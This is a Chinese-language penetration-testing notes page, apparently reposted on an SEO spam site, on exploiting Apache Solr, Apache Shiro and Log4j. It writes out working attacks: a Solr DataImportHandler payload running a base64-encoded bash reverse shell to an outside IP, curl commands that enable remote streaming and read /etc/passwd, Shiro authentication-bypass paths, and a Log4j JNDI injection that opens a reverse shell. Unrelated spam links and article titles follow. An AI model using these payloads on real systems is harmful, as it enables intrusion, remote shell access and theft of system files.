当前位置: 首页 > wzjs >正文

美食网站设计规划书建造师查询入口

美食网站设计规划书,建造师查询入口,传奇类游戏,可以推广的平台solr组件 1、作用 : 基于http和apache lucene 进行全文搜索服务器 2、识别: 第一个就是图标类似于华为的那个 然后就是端口标识是 8983 3、CVE利用: 1、命令执行(CVE-2019-17558) Apache Solr 5.0.0版本至8…

solr组件

1、作用 : 基于http和apache lucene  进行全文搜索服务器

2、识别:

第一个就是图标类似于华为的那个   

然后就是端口标识是  8983

3、CVE利用:

1、命令执行(CVE-2019-17558)

Apache Solr 5.0.0版本至8.3.1

工具:https://github.com/jas502n/solr_rce

2、远程代码执行(条件很苛刻)
CVE-2019-0193
Apache Solr < 8.2.0版本  (这个版本的话当然也是可以直接执行 上边的命令执行)

条件1:Apache Solr的DataImportHandler启用了模块DataImportHandler(默认不会被启用)

条件2:Solr Admin UI未开启鉴权认证。(默认情况无需任何认证)

UI鉴权就是我们不需要进行验证就能登录他的这个sorl后台  一般需要鉴权的如下

利用:

在点进 之后进入 debug模式输入<dataConfig><dataSource type="URLDataSource"/><script><![CDATA[function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45NC4yMzYuMTE3LzU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}");}]]></script><document><entity name="stackoverflow"url="https://stackoverflow.com/feeds/tag/solr"processor="XPathEntityProcessor"forEach="/feed"transformer="script:poc" /></document>
</dataConfig>

这个现在还是比较少见的了

3、sorl  SSRF和任意文件的读取

利用:

http://xxxxxx:8983/solr/admin/cores?indexInfo=false&wt=json

利用 
curl -i -s -k 'http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'demo    是他的name

2、访问触发
curl -i -s -k -X $'POST' \-H $'Content-Type: application/json' --data-binary $'{\"set-property\":{\"requestDispatcher.requestParsers.enableRemoteStreaming\":true}}' \$'http://47.94.236.117:8983/solr/demo/config'
3、任意文件读取
curl -i -s -k 'http://47.94.236.117:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'

Shiro

他的功能就是我们登录的时候点击一个记住我 下次就不用登陆了  这个就是他的功能

识别:

请求头  有个remmberME=1  

影响范围:Apache Shiro <= 1.2.4w

利用

1、反序列化造成的RCE

利用链:链就是 就是它已经加载的这个maven驱动或者是java自带的库

所以面试会问  有key无链怎么办? 1、爆破 2、就是利用java自带的库

授权绕过CVE-2020-11989

Apache Shiro < 1.7.1

本地部署 github上可以直接下载

https://github.com/jweny/shiro-cve-2020-17523 

基本逻辑: 我们输入admin的时候会弹窗  就是因为他设置了一个  map   authc

绕过:版本是在这个范围的

poc

/admin/%20
但是当我们把map删除之后也会失败  版本超也会失败    : 所以CVE的利用和程序设置和版本有很大的关系
3、CVE-2020-1957

利用:

/xxx/..;/admin/
4、CVE-2022-32532

exp:

/permit/a%0any

Log4j

黑盒下很难识别 最简单的方式就是盲打

一般我们攻击这个组件就是使用JNDI 进行注入

先构造一个base64加密的反弹shell

bash -i >& /dev/tcp/192.168.21.17/5566>&1YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxLjE3LzU1NjY+JjE=

使用jndi工具进行生成一个反弹shell的注入

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxLjE3LzU1NjY+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.21.17

rmi:// 192.168.21.17:1099/zzmaai

靶场这里有个可控制的变量payload   把我们的exp进行url编码 :

${jndi:rmi://47.94.236.117:1099/osutj8}

执行成功

经过测试我们知道蓝队中jndi攻击的特征就是   ${jndi:}   这样的payload标识


文章转载自:

http://vpY1QC8T.nfbkp.cn
http://JLXbtJma.nfbkp.cn
http://oA5fdh2L.nfbkp.cn
http://GfkoKiZm.nfbkp.cn
http://saZWEDKl.nfbkp.cn
http://bZpBgc5G.nfbkp.cn
http://mQFvIf7D.nfbkp.cn
http://tteKguQP.nfbkp.cn
http://kMrzsdJ5.nfbkp.cn
http://wOvvcaA2.nfbkp.cn
http://2BXmXqfQ.nfbkp.cn
http://BN9V3U2K.nfbkp.cn
http://IAoEkpJF.nfbkp.cn
http://qtyhLHvh.nfbkp.cn
http://XbvDEE7V.nfbkp.cn
http://BhLdenFB.nfbkp.cn
http://b4hQVuNm.nfbkp.cn
http://uSgTckwt.nfbkp.cn
http://pi6PaLvQ.nfbkp.cn
http://sum7F4m1.nfbkp.cn
http://WBl5bJvi.nfbkp.cn
http://M6PY8IWv.nfbkp.cn
http://GgpJNlZj.nfbkp.cn
http://PYY99ENO.nfbkp.cn
http://64wWEYSk.nfbkp.cn
http://GtX2vTEC.nfbkp.cn
http://vE3A8mT0.nfbkp.cn
http://AxORvZkm.nfbkp.cn
http://JiInnzNe.nfbkp.cn
http://3XXyzPFW.nfbkp.cn
http://www.dtcms.com/wzjs/683928.html

相关文章:

  • 阿里巴巴网站的营销策略义乌兼职网站建设
  • 做外国网站用什么服务器网站优化需要什么软件
  • 免费建站自己的网址珠海左右创意园网站开发
  • 做图书馆网站网站支付接口怎么做
  • 智能建站系统郴州专业的网站建设
  • 网站建设的需要的工具淘宝类网站开发
  • 什么网站可以做pie chart物流网站建设网
  • 机构网站源码网页制作基础教程第二版教材
  • 算命网站开发网络营销环境案例
  • 办网站用什么证件深圳市公租房官网
  • 徐州住房与城乡建设部网站设计摄影作品
  • vs网站开发表格大小设置wordpress 时间调用
  • 网站设计网站制作医院网站建设技术方案ppt
  • 什么网站做ppt做网站的软件帝国
  • 老山网站建设临沂网站建设和轶件安装
  • 上街区网站建设网站建设分金手指专业二五
  • 公司网站维护和更新属于哪个部门黄骅港信息贴吧
  • 网站展示程序wordpress删除
  • 资源网站优化排名优化wordpress禁用修订
  • 视频教学网站开发更换网站logo
  • html5手机网站开发区别小程序游戏怎么赚钱
  • 深圳网站建设定制开发超凡科技做音乐分享的网站
  • 用thinkphp做音乐网站怎么营销自己的产品
  • p2p网站制作流程榆次做企业网站
  • 400网站建设推广定制一款app要多少钱
  • 网站怎么做留言提交功能建设校园网站必要性
  • 企业网站建设东莞化妆品设计网站
  • 学做网站赚钱方法南京网站开发南京乐识不错
  • 网站申请建设深圳工程建设交易服务中心网站
  • 免费做网站怎么做网站自己做文学网站赚钱吗